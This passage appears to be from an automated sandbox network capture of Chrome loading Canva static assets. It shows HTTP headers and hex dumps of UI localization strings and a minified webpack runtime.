                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 5c 22 2c 5c 22 53 61 6b 7a 55 67 5c 22 3a 5c 22 55 73 65 20 38 20 6f 72 20 6d 6f 72 65 20 63 68 61 72 61 63 74 65 72 73 20 77 69 74 68 20 61 20 6d 69 78 20 6f 66 20 6c 65 74 74 65 72 73 2c 20 6e 75 6d 62 65 72 73 20 26 20 73 79 6d 62 6f 6c 73 2e 5c 22 2c 5c 22 2b 77 31 2f 36 41 5c 22 3a 5c 22 43 61 6e 76 61 20 68 61 73 20 65 78 70 65 72 69 65 6e 63 65 64 20 61 20 74 65 63 68 6e 69 63 61 6c 20 69 73 73 75 65 2e 20 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 5c 22 2c 5c 22 55 78 70 38 58 77 5c 22 3a 5c 22 4a 75 6c 69 65 20 53 6d 69 74 68 5c 22 2c 5c 22 37 45 56 77 66 77 5c 22 3a 5c 22 41 67 72 65 65 5c 22 2c 5c 22 66 4c 33 48 57 51 5c 22 3a 5c 22 43 6f 64 65 5c 22 2c 5c 22 70 64 72 45 65 77 5c 22 3a 5c 22 45 64 69 74 20 74 68 65 20
                                                                                                                                                                                                                                                                    Data Ascii: \",\"SakzUg\":\"Use 8 or more characters with a mix of letters, numbers & symbols.\",\"+w1/6A\":\"Canva has experienced a technical issue. Please try again later.\",\"Uxp8Xw\":\"Julie Smith\",\"7EVwfw\":\"Agree\",\"fL3HWQ\":\"Code\",\"pdrEew\":\"Edit the
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 49 77 67 5c 22 3a 5c 22 53 68 61 72 65 5c 22 2c 5c 22 47 57 65 61 35 51 5c 22 3a 5c 22 47 6f 20 74 6f 20 6e 65 78 74 20 70 61 67 65 5c 22 2c 5c 22 41 65 49 59 62 77 5c 22 3a 5c 22 4e 6f 20 64 61 74 61 20 74 6f 20 64 69 73 70 6c 61 79 5c 22 2c 5c 22 67 52 44 68 64 67 5c 22 3a 5c 22 4d 61 79 5c 22 2c 5c 22 43 45 46 6f 6b 51 5c 22 3a 5c 22 43 6f 6e 74 69 6e 75 65 20 77 69 74 68 20 65 6d 61 69 6c 5c 22 2c 5c 22 4c 72 35 72 4b 77 5c 22 3a 5c 22 43 6c 6f 73 65 5c 22 2c 5c 22 79 4b 6c 52 41 51 5c 22 3a 5c 22 43 6f 6e 74 69 6e 75 65 5c 22 2c 5c 22 32 66 54 41 77 51 5c 22 3a 5c 22 4c 6f 67 20 69 6e 74 6f 20 79 6f 75 72 20 65 78 69 73 74 69 6e 67 20 61 63 63 6f 75 6e 74 5c 22 2c 5c 22 31 48 41 71 30 77 5c 22 3a 5c 22 50 65 72 66 6f 72 6d 20 f0 9f a4 94 20 72 65 61
                                                                                                                                                                                                                                                                    Data Ascii: Iwg\":\"Share\",\"GWea5Q\":\"Go to next page\",\"AeIYbw\":\"No data to display\",\"gRDhdg\":\"May\",\"CEFokQ\":\"Continue with email\",\"Lr5rKw\":\"Close\",\"yKlRAQ\":\"Continue\",\"2fTAwQ\":\"Log into your existing account\",\"1HAq0w\":\"Perform rea
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 4b 31 6e 63 45 77 5c 22 3a 5c 22 47 6f 20 74 6f 20 70 61 67 65 20 7b 30 2c 20 6e 75 6d 62 65 72 7d 20 2f 20 7b 31 2c 20 6e 75 6d 62 65 72 7d 5c 22 2c 5c 22 6b 34 46 49 74 67 5c 22 3a 5c 22 42 61 6e 6e 65 72 5c 22 2c 5c 22 31 76 55 69 45 77 5c 22 3a 5c 22 55 70 5c 22 2c 5c 22 5a 6b 4c 35 35 51 5c 22 3a 5c 22 4e 65 78 74 5c 22 2c 5c 22 39 78 49 71 45 67 5c 22 3a 5c 22 42 79 20 6c 6f 67 67 69 6e 67 20 69 6e 2c 20 79 6f 75 e2 80 99 6c 6c 20 72 65 73 74 6f 72 65 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 2e 5c 22 2c 5c 22 70 6c 64 6c 34 51 5c 22 3a 5c 22 43 6f 6d 6d 65 6e 74 2c 20 72 65 61 63 74 20 61 6e 64 20 63 72 65 61 74 65 20 77 69 74 68 20 43 61 6e 76 61 5c 22 2c 5c 22 37 2b 6b 4a 31 41 5c 22 3a 5c 22 5a 6f 6f 6d 20 6f 75 74 20 6f 6e 65 20 6c 65 76 65 6c 5c
                                                                                                                                                                                                                                                                    Data Ascii: K1ncEw\":\"Go to page {0, number} / {1, number}\",\"k4FItg\":\"Banner\",\"1vUiEw\":\"Up\",\"ZkL55Q\":\"Next\",\"9xIqEg\":\"By logging in, youll restore your account.\",\"pldl4Q\":\"Comment, react and create with Canva\",\"7+kJ1A\":\"Zoom out one level\


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    8192.168.2.1249728104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:29 UTC571OUTGET /web/51bb9612ee6d1bb7.runtime.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1343INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:30 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 40182
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950ce5f19426b-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                    Age: 49970
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "8e3c6f8a76ecb27f12910c84ed17812f"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:16 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:16 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: K/7q9U3NcA0MVxbfxo8XbmfD7ms3jGk/GQsI9s9z0j+5Uz/wUhGl2Ye0dtgHSeiw6VL0M/AUJmd1qJjENh1IpwiTT70KRGnN
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: C6NBJJCCKG2EP8Q2
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: ok6fLByPHt2REyJYZSXuKbtrmjD0uGzd
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC814INData Raw: 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 6e 6d 43 38 77 51 48 4f 5a 38 35 42 6d 69 4e 75 68 39 74 2e 74 72 66 4d 4a 5f 5a 64 38 49 6d 5f 74 61 6f 6f 4b 67 37 30 33 4e 38 2d 31 37 33 32 31 31 34 38 39 30 2d 31 2e 30 2e 31 2e 31 2d 34 5f 31 69 38 69 34 42 46 6e 4e 4a 44 59 48 74 4a 66 65 4e 69 72 54 61 42 4d 30 64 42 6d 61 6f 6e 4a 38 47 70 56 30 6a 69 57 4d 49 43 44 6b 79 6f 53 5a 7a 6e 49 32 79 68 69 6b 68 64 31 79 32 79 6e 63 49 36 35 6b 68 68 36 6a 49 6e 30 39 36 44 6b 46 6d 32 77 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 57 65 64 2c 20 32 30 2d 4e 6f 76 2d 32 34 20 31 35 3a 33 31 3a 33 30 20 47 4d 54 3b 20 64 6f 6d 61 69 6e
                                                                                                                                                                                                                                                                    Data Ascii: X-Content-Type-Options: nosniffSet-Cookie: __cf_bm=nmC8wQHOZ85BmiNuh9t.trfMJ_Zd8Im_taooKg703N8-1732114890-1.0.1.1-4_1i8i4BFnNJDYHtJfeNirTaBM0dBmaonJ8GpV0jiWMICDkyoSZznI2yhikhd1y2yncI65khh6jIn096DkFm2w; path=/; expires=Wed, 20-Nov-24 15:31:30 GMT; domain
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC581INData Raw: 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 2c 72 2c 74 2c 66 2c 73 2c 6e 3d 7b 7d 2c 63 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 76 61 72 20 72 3d 63 5b 65 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 72 29 72 65 74 75 72 6e 20 72 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 74 3d 63 5b 65 5d 3d 7b 69 64 3a 65 2c 6c 6f 61 64 65 64 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 6e 5b 65 5d 2e 63 61 6c 6c 28 74 2e 65 78 70 6f 72 74 73 2c 74 2c 74 2e 65 78 70 6f 72 74 73 2c 69 29 2c 74 2e 6c 6f 61 64 65 64 3d 21 30 2c 74 2e 65 78 70 6f 72 74 73 7d 69 2e 6d 3d 6e 2c 69 2e 61 6d 64 44 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 64 65 66 69 6e 65 20 63 61 6e 6e 6f
                                                                                                                                                                                                                                                                    Data Ascii: (()=>{"use strict";var e,r,t,f,s,n={},c={};function i(e){var r=c[e];if(void 0!==r)return r.exports;var t=c[e]={id:e,loaded:!1,exports:{}};return n[e].call(t.exports,t,t.exports,i),t.loaded=!0,t.exports}i.m=n,i.amdD=function(){throw new Error("define canno
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 3e 30 26 26 65 5b 64 2d 31 5d 5b 32 5d 3e 73 3b 64 2d 2d 29 65 5b 64 5d 3d 65 5b 64 2d 31 5d 3b 65 5b 64 5d 3d 5b 74 2c 66 2c 73 5d 7d 7d 2c 69 2e 6e 3d 65 3d 3e 7b 76 61 72 20 72 3d 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 28 29 3d 3e 65 2e 64 65 66 61 75 6c 74 3a 28 29 3d 3e 65 3b 72 65 74 75 72 6e 20 69 2e 64 28 72 2c 7b 61 3a 72 7d 29 2c 72 7d 2c 74 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 65 3d 3e 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 29 3a 65 3d 3e 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 2c 69 2e 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 66 29 7b 69 66 28 31 26 66 29 65 3d 74 68 69 73 28 65 29 3b 69 66 28 38 26 66 29 72 65 74 75 72 6e 20 65 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65
                                                                                                                                                                                                                                                                    Data Ascii: >0&&e[d-1][2]>s;d--)e[d]=e[d-1];e[d]=[t,f,s]}},i.n=e=>{var r=e&&e.__esModule?()=>e.default:()=>e;return i.d(r,{a:r}),r},t=Object.getPrototypeOf?e=>Object.getPrototypeOf(e):e=>e.__proto__,i.t=function(e,f){if(1&f)e=this(e);if(8&f)return e;if("object"==type
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 72 6e 22 37 66 61 39 31 33 64 63 34 31 38 38 35 32 32 34 2e 6a 73 22 3b 69 66 28 31 33 34 35 3d 3d 3d 65 29 72 65 74 75 72 6e 22 61 36 66 35 34 32 33 30 36 37 39 62 38 38 31 62 2e 6a 73 22 3b 69 66 28 39 31 36 37 3d 3d 3d 65 29 72 65 74 75 72 6e 22 34 65 65 61 35 33 33 64 61 39 31 62 38 34 33 62 2e 6a 73 22 3b 69 66 28 38 36 39 3d 3d 3d 65 29 72 65 74 75 72 6e 22 38 63 62 62 64 38 66 34 39 61 31 35 61 31 64 38 2e 6a 73 22 3b 69 66 28 34 30 34 33 3d 3d 3d 65 29 72 65 74 75 72 6e 22 34 62 36 38 36 66 36 33 63 35 33 39 30 30 65 35 2e 76 65 6e 64 6f 72 2e 6a 73 22 3b 69 66 28 31 37 36 31 3d 3d 3d 65 29 72 65 74 75 72 6e 22 36 33 62 35 64 31 65 34 38 35 39 31 62 64 31 38 2e 76 65 6e 64 6f 72 2e 6a 73 22 3b 69 66 28 36 32 36 34 3d 3d 3d 65 29 72 65 74 75 72 6e
                                                                                                                                                                                                                                                                    Data Ascii: rn"7fa913dc41885224.js";if(1345===e)return"a6f54230679b881b.js";if(9167===e)return"4eea533da91b843b.js";if(869===e)return"8cbbd8f49a15a1d8.js";if(4043===e)return"4b686f63c53900e5.vendor.js";if(1761===e)return"63b5d1e48591bd18.vendor.js";if(6264===e)return
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 72 6e 22 33 39 61 36 31 39 35 63 34 30 65 38 38 35 63 62 2e 6a 73 22 3b 69 66 28 32 38 33 3d 3d 3d 65 29 72 65 74 75 72 6e 22 35 63 61 30 61 33 34 62 36 65 33 38 31 64 65 66 2e 6a 73 22 3b 69 66 28 34 34 33 36 3d 3d 3d 65 29 72 65 74 75 72 6e 22 65 39 35 64 66 33 30 33 65 30 30 65 39 30 38 36 2e 6a 73 22 3b 69 66 28 35 30 31 39 3d 3d 3d 65 29 72 65 74 75 72 6e 22 33 36 61 33 39 61 62 61 63 65 66 32 64 65 32 64 2e 6a 73 22 3b 69 66 28 31 34 39 33 3d 3d 3d 65 29 72 65 74 75 72 6e 22 35 31 61 36 35 62 65 61 32 36 37 66 30 61 36 35 2e 6a 73 22 3b 69 66 28 33 36 33 37 3d 3d 3d 65 29 72 65 74 75 72 6e 22 31 61 66 33 38 34 35 37 35 32 32 36 38 66 32 62 2e 6a 73 22 3b 69 66 28 31 33 31 3d 3d 3d 65 29 72 65 74 75 72 6e 22 36 64 66 32 31 63 30 61 64 37 32 36 66 35
                                                                                                                                                                                                                                                                    Data Ascii: rn"39a6195c40e885cb.js";if(283===e)return"5ca0a34b6e381def.js";if(4436===e)return"e95df303e00e9086.js";if(5019===e)return"36a39abacef2de2d.js";if(1493===e)return"51a65bea267f0a65.js";if(3637===e)return"1af3845752268f2b.js";if(131===e)return"6df21c0ad726f5
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 62 39 30 34 62 65 37 64 33 34 32 36 39 34 2e 6a 73 22 3b 69 66 28 38 30 33 30 3d 3d 3d 65 29 72 65 74 75 72 6e 22 62 66 66 34 37 61 62 36 36 30 30 31 30 38 65 65 2e 6a 73 22 3b 69 66 28 35 39 31 39 3d 3d 3d 65 29 72 65 74 75 72 6e 22 64 35 35 61 38 63 35 65 31 33 35 31 34 39 62 30 2e 6a 73 22 3b 69 66 28 35 36 36 39 3d 3d 3d 65 29 72 65 74 75 72 6e 22 65 36 64 66 30 38 39 32 64 37 62 37 62 35 64 65 2e 6a 73 22 3b 69 66 28 35 31 39 35 3d 3d 3d 65 29 72 65 74 75 72 6e 22 30 64 32 37 61 33 30 38 31 33 39 61 32 31 64 63 2e 6a 73 22 3b 69 66 28 31 35 34 32 3d 3d 3d 65 29 72 65 74 75 72 6e 22 36 61 65 65 33 35 39 31 34 37 63 36 37 32 36 33 2e 6a 73 22 3b 69 66 28 35 30 39 38 3d 3d 3d 65 29 72 65 74 75 72 6e 22 66 37 66 35 35 64 62 33 65 38 36 62 36 65 37 65 2e
                                                                                                                                                                                                                                                                    Data Ascii: b904be7d342694.js";if(8030===e)return"bff47ab6600108ee.js";if(5919===e)return"d55a8c5e135149b0.js";if(5669===e)return"e6df0892d7b7b5de.js";if(5195===e)return"0d27a308139a21dc.js";if(1542===e)return"6aee359147c67263.js";if(5098===e)return"f7f55db3e86b6e7e.
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 64 64 61 31 38 65 34 36 61 33 2e 6a 73 22 3b 69 66 28 39 33 31 32 3d 3d 3d 65 29 72 65 74 75 72 6e 22 34 66 32 63 64 62 36 30 36 31 31 34 66 30 35 33 2e 6a 73 22 3b 69 66 28 37 35 37 33 3d 3d 3d 65 29 72 65 74 75 72 6e 22 31 34 66 62 37 32 32 35 33 36 39 63 34 30 35 64 2e 6a 73 22 3b 69 66 28 39 34 37 39 3d 3d 3d 65 29 72 65 74 75 72 6e 22 31 33 31 65 62 34 33 39 32 63 32 30 31 61 30 64 2e 6a 73 22 3b 69 66 28 34 38 33 32 3d 3d 3d 65 29 72 65 74 75 72 6e 22 38 37 31 35 65 65 31 33 34 63 33 31 39 33 31 37 2e 6a 73 22 3b 69 66 28 36 31 30 31 3d 3d 3d 65 29 72 65 74 75 72 6e 22 62 64 37 35 35 66 39 38 33 37 31 36 34 37 32 31 2e 6a 73 22 3b 69 66 28 37 31 32 32 3d 3d 3d 65 29 72 65 74 75 72 6e 22 64 33 62 62 30 35 38 35 39 36 34 31 64 62 62 64 2e 6a 73 22 3b
                                                                                                                                                                                                                                                                    Data Ascii: dda18e46a3.js";if(9312===e)return"4f2cdb606114f053.js";if(7573===e)return"14fb7225369c405d.js";if(9479===e)return"131eb4392c201a0d.js";if(4832===e)return"8715ee134c319317.js";if(6101===e)return"bd755f9837164721.js";if(7122===e)return"d3bb05859641dbbd.js";
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 30 31 30 64 34 32 2e 6a 73 22 3b 69 66 28 37 31 36 30 3d 3d 3d 65 29 72 65 74 75 72 6e 22 37 35 62 32 39 35 35 35 61 31 34 65 64 36 35 61 2e 6a 73 22 3b 69 66 28 31 36 35 39 3d 3d 3d 65 29 72 65 74 75 72 6e 22 38 32 32 65 30 30 36 34 32 35 32 35 63 63 62 33 2e 6a 73 22 3b 69 66 28 33 33 34 3d 3d 3d 65 29 72 65 74 75 72 6e 22 36 63 30 38 30 64 63 32 38 64 33 34 33 36 30 37 2e 6a 73 22 3b 69 66 28 32 31 34 31 3d 3d 3d 65 29 72 65 74 75 72 6e 22 65 63 38 64 32 34 31 39 65 39 33 31 61 65 62 64 2e 6a 73 22 3b 69 66 28 31 32 38 32 3d 3d 3d 65 29 72 65 74 75 72 6e 22 33 31 65 30 30 66 31 62 39 66 37 31 38 39 31 61 2e 6a 73 22 3b 69 66 28 32 35 30 36 3d 3d 3d 65 29 72 65 74 75 72 6e 22 35 31 34 30 38 38 36 37 39 65 65 31 31 34 63 35 2e 6a 73 22 3b 69 66 28 39 38
                                                                                                                                                                                                                                                                    Data Ascii: 010d42.js";if(7160===e)return"75b29555a14ed65a.js";if(1659===e)return"822e00642525ccb3.js";if(334===e)return"6c080dc28d343607.js";if(2141===e)return"ec8d2419e931aebd.js";if(1282===e)return"31e00f1b9f71891a.js";if(2506===e)return"514088679ee114c5.js";if(98
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 36 3a 31 2c 35 30 37 3a 31 2c 37 34 36 34 3a 31 2c 32 36 37 39 3a 31 2c 36 36 34 36 3a 31 2c 34 30 34 33 3a 31 2c 31 37 36 31 3a 31 2c 37 37 38 33 3a 31 2c 31 38 30 3a 31 2c 33 38 38 34 3a 31 2c 35 31 33 36 3a 31 2c 39 32 39 3a 31 7d 5b 65 5d 29 72 65 74 75 72 6e 22 65 66 34 36 64 62 33 37 35 31 64 38 65 39 39 39 2e 76 65 6e 64 6f 72 2e 6c 74 72 2e 63 73 73 22 3b 69 66 28 37 30 34 35 3d 3d 3d 65 29 72 65 74 75 72 6e 22 36 32 64 37 31 36 30 35 33 63 33 36 31 35 38 35 2e 6c 74 72 2e 63 73 73 22 3b 69 66 28 34 32 32 31 3d 3d 3d 65 29 72 65 74 75 72 6e 22 37 37 37 64 65 31 63 35 31 37 33 64 32 31 31 39 2e 6c 74 72 2e 63 73 73 22 3b 69 66 28 39 36 33 30 3d 3d 3d 65 29 72 65 74 75 72 6e 22 39 33 35 38 34 62 65 63 63 31 35 36 63 31 66 64 2e 6c 74 72 2e 63 73 73
                                                                                                                                                                                                                                                                    Data Ascii: 6:1,507:1,7464:1,2679:1,6646:1,4043:1,1761:1,7783:1,180:1,3884:1,5136:1,929:1}[e])return"ef46db3751d8e999.vendor.ltr.css";if(7045===e)return"62d716053c361585.ltr.css";if(4221===e)return"777de1c5173d2119.ltr.css";if(9630===e)return"93584becc156c1fd.ltr.css
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 39 63 66 64 30 61 66 38 38 30 64 30 38 34 2e 6c 74 72 2e 63 73 73 22 3b 69 66 28 37 34 36 39 3d 3d 3d 65 29 72 65 74 75 72 6e 22 62 33 31 35 33 65 39 34 61 35 34 38 32 64 30 62 2e 6c 74 72 2e 63 73 73 22 3b 69 66 28 34 34 36 34 3d 3d 3d 65 29 72 65 74 75 72 6e 22 39 65 32 64 34 37 32 30 66 66 61 63 35 61 66 34 2e 6c 74 72 2e 63 73 73 22 3b 69 66 28 35 38 35 39 3d 3d 3d 65 29 72 65 74 75 72 6e 22 33 31 39 62 62 63 64 31 63 65 63 64 62 36 65 65 2e 6c 74 72 2e 63 73 73 22 3b 69 66 28 32 31 30 3d 3d 3d 65 29 72 65 74 75 72 6e 22 66 32 61 65 34 33 65 61 63 31 30 61 35 61 33 36 2e 6c 74 72 2e 63 73 73 22 3b 69 66 28 31 30 36 30 3d 3d 3d 65 29 72 65 74 75 72 6e 22 35 65 62 31 35 63 37 31 39 34 31 32 61 63 36 36 2e 6c 74 72 2e 63 73 73 22 3b 69 66 28 38 37 31 34
                                                                                                                                                                                                                                                                    Data Ascii: 9cfd0af880d084.ltr.css";if(7469===e)return"b3153e94a5482d0b.ltr.css";if(4464===e)return"9e2d4720ffac5af4.ltr.css";if(5859===e)return"319bbcd1cecdb6ee.ltr.css";if(210===e)return"f2ae43eac10a5a36.ltr.css";if(1060===e)return"5eb15c719412ac66.ltr.css";if(8714


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    9192.168.2.1249723104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:29 UTC570OUTGET /web/ad9231ed6706fadf.vendor.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1358INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:30 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 418962
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950ce5918c3fd-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                    Age: 1318240
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "74774747b99f5dec64505a1e8a9af3af"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:15 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 02 Oct 2024 01:22:08 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 03 Oct 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: nh4dPigBNkQQnaHrhv5Iod4B3H+h80wf2+hcLc2oCvcxQ9PXCurdH2ioOWChtmmJuzSBYr1EWoeMvumYMhfPTzsEQUi5jepcp9GfDNRTU58=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: B9Z6HKF7H5SKNBF7
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: Vep5esUOiAlk_YOGgeW99vWBouhV9n9g
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC810INData Raw: 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 46 59 44 71 6e 59 68 74 36 4b 6b 43 53 36 6e 2e 39 6d 6d 6f 64 61 74 31 48 78 72 79 6f 33 46 69 6f 33 65 48 75 30 51 68 4b 36 55 2d 31 37 33 32 31 31 34 38 39 30 2d 31 2e 30 2e 31 2e 31 2d 51 74 6c 37 75 68 30 6c 61 58 66 6e 72 2e 41 46 50 35 4f 74 4f 41 34 68 47 73 75 66 79 48 49 34 79 68 74 62 50 64 67 66 45 51 76 4f 62 71 37 62 32 4c 75 36 30 49 6b 6f 33 34 76 6c 6f 6c 4a 71 33 30 54 4d 6c 69 36 58 65 53 38 51 48 71 39 63 32 34 63 5a 57 41 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 57 65 64 2c 20 32 30 2d 4e 6f 76 2d 32 34 20 31 35 3a 33 31 3a 33 30 20 47 4d 54 3b 20 64 6f 6d 61 69 6e
